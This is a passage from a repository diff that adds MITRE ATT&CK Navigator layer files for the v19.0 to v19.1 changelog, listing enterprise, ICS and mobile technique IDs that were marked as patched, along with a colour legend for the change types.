+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.003",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.005",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.005",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1497.003",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1497.003",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1070.006",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1134.001",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1134.001",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1588.002",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1205",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1205",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1205",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1565.002",
+            "tactic": "impact",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1484.002",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1484.002",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1127",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1127",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1199",
+            "tactic": "initial-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1059.004",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1546.004",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1546.004",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1535",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1608.001",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1608.002",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1550",
+            "tactic": "lateral-movement",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1497.002",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1497.002",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1564.007",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.014",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.014",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1078",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1078",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1078",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1078",
+            "tactic": "initial-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1218.012",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1125",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1673",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1584.003",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1583.003",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1497",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1497",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1059.005",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1595.002",
+            "tactic": "reconnaissance",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1600",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1056.003",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1056.003",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1071.001",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1102",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1583.006",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1550.004",
+            "tactic": "lateral-movement",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1505.003",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1059.003",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1686.003",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1047",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1222.001",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1543.003",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1543.003",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1683.001",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1220",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        }
+    ],
+    "sorting": 0,
+    "hideDisabled": false,
+    "legendItems": [
+        {
+            "color": "#a1d99b",
+            "label": "additions: ATT&CK objects which are only present in the new release."
+        },
+        {
+            "color": "#fcf3a2",
+            "label": "major_version_changes: ATT&CK objects that have a major version change. (e.g. 1.0 \u2192 2.0)"
+        },
+        {
+            "color": "#c7c4e0",
+            "label": "minor_version_changes: ATT&CK objects that have a minor version change. (e.g. 1.0 \u2192 1.1)"
+        },
+        {
+            "color": "#B5E5CF",
+            "label": "other_version_changes: ATT&CK objects that have a version change of any other kind. (e.g. 1.0 \u2192 1.2)"
+        },
+        {
+            "color": "#B99095",
+            "label": "patches: ATT&CK objects that have been patched while keeping the version the same. (e.g., 1.0 \u2192 1.0 but something like a typo, a URL, or some metadata was fixed)"
+        },
+        {
+            "color": "#ff9000",
+            "label": "revocations: ATT&CK objects which are revoked by a different object."
+        },
+        {
+            "color": "#ff6363",
+            "label": "deprecations: ATT&CK objects which are deprecated and no longer in use, and not replaced."
+        },
+        {
+            "color": "#ff00e1",
+            "label": "deletions: ATT&CK objects which are no longer found in the STIX data."
+        },
+        {
+            "color": "#ffffff",
+            "label": "unchanged: ATT&CK objects which did not change between the two versions."
+        }
+    ],
+    "showTacticRowBackground": true,
+    "tacticRowBackground": "#205b8f",
+    "selectTechniquesAcrossTactics": true
+}
\ No newline at end of file
diff --git a/modules/resources/docs/changelogs/v19.0-v19.1/layer-ics.json b/modules/resources/docs/changelogs/v19.0-v19.1/layer-ics.json
new file mode 100644
index 00000000000..d9995e418a5
--- /dev/null
+++ b/modules/resources/docs/changelogs/v19.0-v19.1/layer-ics.json
@@ -0,0 +1,468 @@
+{
+    "versions": {
+        "layer": "4.5",
+        "navigator": "5.0.0",
+        "attack": "19.1"
+    },
+    "name": "May 2026 ICS Updates",
+    "description": "ICS updates for the May 2026 release of ATT&CK",
+    "domain": "ics-attack",
+    "techniques": [
+        {
+            "techniqueID": "T0800",
+            "tactic": "inhibit-response-function",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1695",
+            "tactic": "inhibit-response-function",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1691",
+            "tactic": "inhibit-response-function",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0846.002",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0892",
+            "tactic": "inhibit-response-function",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0858",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0858",
+            "tactic": "evasion",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1691.001",
+            "tactic": "inhibit-response-function",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1692.001",
+            "tactic": "evasion",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1692.001",
+            "tactic": "impair-process-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0807",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0885",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0809",
+            "tactic": "inhibit-response-function",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1694.001",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1694.001",
+            "tactic": "lateral-movement",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0816",
+            "tactic": "inhibit-response-function",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0843.001",
+            "tactic": "lateral-movement",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1695.002",
+            "tactic": "inhibit-response-function",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0822",
+            "tactic": "initial-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0823",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1694.002",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1694.002",
+            "tactic": "lateral-movement",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1694",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1694",
+            "tactic": "lateral-movement",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0827",
+            "tactic": "impact",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0829",
+            "tactic": "impact",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0838",
+            "tactic": "inhibit-response-function",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1693",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1693",
+            "tactic": "inhibit-response-function",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1693",
+            "tactic": "impair-process-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1693.002",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1693.002",
+            "tactic": "inhibit-response-function",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1693.002",
+            "tactic": "impair-process-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0846.003",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0840",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0843.002",
+            "tactic": "lateral-movement",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0846.001",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0843.003",
+            "tactic": "lateral-movement",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0843",
+            "tactic": "lateral-movement",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0873",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0886",
+            "tactic": "initial-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0886",
+            "tactic": "lateral-movement",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0846",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0888",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1691.002",
+            "tactic": "inhibit-response-function",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1692.002",
+            "tactic": "evasion",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1692.002",
+            "tactic": "impair-process-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0852",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1695.001",
+            "tactic": "inhibit-response-function",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0873.001",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1693.001",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1693.001",
+            "tactic": "inhibit-response-function",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1693.001",
+            "tactic": "impair-process-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0882",
+            "tactic": "impact",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1692",
+            "tactic": "evasion",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1692",
+            "tactic": "impair-process-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0859",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T0859",
+            "tactic": "lateral-movement",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1695.003",
+            "tactic": "inhibit-response-function",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        }
+    ],
+    "sorting": 0,
+    "hideDisabled": false,
+    "legendItems": [
+        {
+            "color": "#a1d99b",
+            "label": "additions: ATT&CK objects which are only present in the new release."
+        },
+        {
+            "color": "#fcf3a2",
+            "label": "major_version_changes: ATT&CK objects that have a major version change. (e.g. 1.0 \u2192 2.0)"
+        },
+        {
+            "color": "#c7c4e0",
+            "label": "minor_version_changes: ATT&CK objects that have a minor version change. (e.g. 1.0 \u2192 1.1)"
+        },
+        {
+            "color": "#B5E5CF",
+            "label": "other_version_changes: ATT&CK objects that have a version change of any other kind. (e.g. 1.0 \u2192 1.2)"
+        },
+        {
+            "color": "#B99095",
+            "label": "patches: ATT&CK objects that have been patched while keeping the version the same. (e.g., 1.0 \u2192 1.0 but something like a typo, a URL, or some metadata was fixed)"
+        },
+        {
+            "color": "#ff9000",
+            "label": "revocations: ATT&CK objects which are revoked by a different object."
+        },
+        {
+            "color": "#ff6363",
+            "label": "deprecations: ATT&CK objects which are deprecated and no longer in use, and not replaced."
+        },
+        {
+            "color": "#ff00e1",
+            "label": "deletions: ATT&CK objects which are no longer found in the STIX data."
+        },
+        {
+            "color": "#ffffff",
+            "label": "unchanged: ATT&CK objects which did not change between the two versions."
+        }
+    ],
+    "showTacticRowBackground": true,
+    "tacticRowBackground": "#205b8f",
+    "selectTechniquesAcrossTactics": true
+}
\ No newline at end of file
diff --git a/modules/resources/docs/changelogs/v19.0-v19.1/layer-mobile.json b/modules/resources/docs/changelogs/v19.0-v19.1/layer-mobile.json
new file mode 100644
index 00000000000..4b8837fe8ec
--- /dev/null
+++ b/modules/resources/docs/changelogs/v19.0-v19.1/layer-mobile.json
@@ -0,0 +1,433 @@
+{
+    "versions": {
+        "layer": "4.5",
+        "navigator": "5.0.0",
+        "attack": "19.1"
+    },
+    "name": "May 2026 Mobile Updates",
+    "description": "Mobile updates for the May 2026 release of ATT&CK",
+    "domain": "mobile-attack",
+    "techniques": [
+        {
+            "techniqueID": "T1453",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1453",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1517",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1517",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1636.005",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1429",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1481.002",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1624.001",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1616",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1616",
+            "tactic": "impact",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1616",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1636.002",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1636.003",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1662",
+            "tactic": "impact",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1533",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1626.001",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1407",
+            "tactic": "defense-evasion",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1627",
+            "tactic": "defense-evasion",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1646",
+            "tactic": "exfiltration",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1639.001",
+            "tactic": "exfiltration",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1630.002",
+            "tactic": "defense-evasion",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1420",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1541",
+            "tactic": "defense-evasion",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1541",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1417.002",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1417.002",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1544",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1516",
+            "tactic": "defense-evasion",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1516",
+            "tactic": "impact",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1417.001",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1417.001",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1430",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1430",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1461",
+            "tactic": "initial-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1655",
+            "tactic": "defense-evasion",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1655.001",
+            "tactic": "defense-evasion",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1575",
+            "tactic": "defense-evasion",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1575",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1406",
+            "tactic": "defense-evasion",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1660",
+            "tactic": "initial-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1629.001",
+            "tactic": "defense-evasion",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1582",
+            "tactic": "impact",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1636.004",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1513",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1418",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1406.002",
+            "tactic": "defense-evasion",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1409",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1426",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1422",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1630.001",
+            "tactic": "defense-evasion",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1628.002",
+            "tactic": "defense-evasion",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1512",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1437.001",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1422.002",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        }
+    ],
+    "sorting": 0,
+    "hideDisabled": false,
+    "legendItems": [
+        {
+            "color": "#a1d99b",
+            "label": "additions: ATT&CK objects which are only present in the new release."
+        },
+        {
+            "color": "#fcf3a2",
+            "label": "major_version_changes: ATT&CK objects that have a major version change. (e.g. 1.0 \u2192 2.0)"
+        },
+        {
+            "color": "#c7c4e0",
+            "label": "minor_version_changes: ATT&CK objects that have a minor version change. (e.g. 1.0 \u2192 1.1)"
+        },
+        {
+            "color": "#B5E5CF",
+            "label": "other_version_changes: ATT&CK objects that have a version change of any other kind. (e.g. 1.0 \u2192 1.2)"
+        },
+        {
+            "color": "#B99095",
+            "label": "patches: ATT&CK objects that have been patched while keeping the version the same. (e.g., 1.0 \u2192 1.0 but something like a typo, a URL, or some metadata was fixed)"
+        },
+        {
+            "color": "#ff9000",
+            "label": "revocations: ATT&CK objects which are revoked by a different object."
+        },
+        {
+            "color": "#ff6363",
+            "label": "deprecations: ATT&CK objects which are deprecated and no longer in use, and not replaced."
+        },
+        {
+            "color": "#ff00e1",
+            "label": "deletions: ATT&CK objects which are no longer found in the STIX data."
+        },
+        {
+            "color": "#ffffff",
+            "label": "unchanged: ATT&CK objects which did not change between the two versions."
+        }
+    ],
+    "showTacticRowBackground": true,
+    "tacticRowBackground": "#205b8f",
+    "selectTechniquesAcrossTactics": true
+}
\ No newline at end of file
diff --git a/modules/resources/static_pages/updates-april-2026.md b/modules/resources/static_pages/updates-april-2026.md
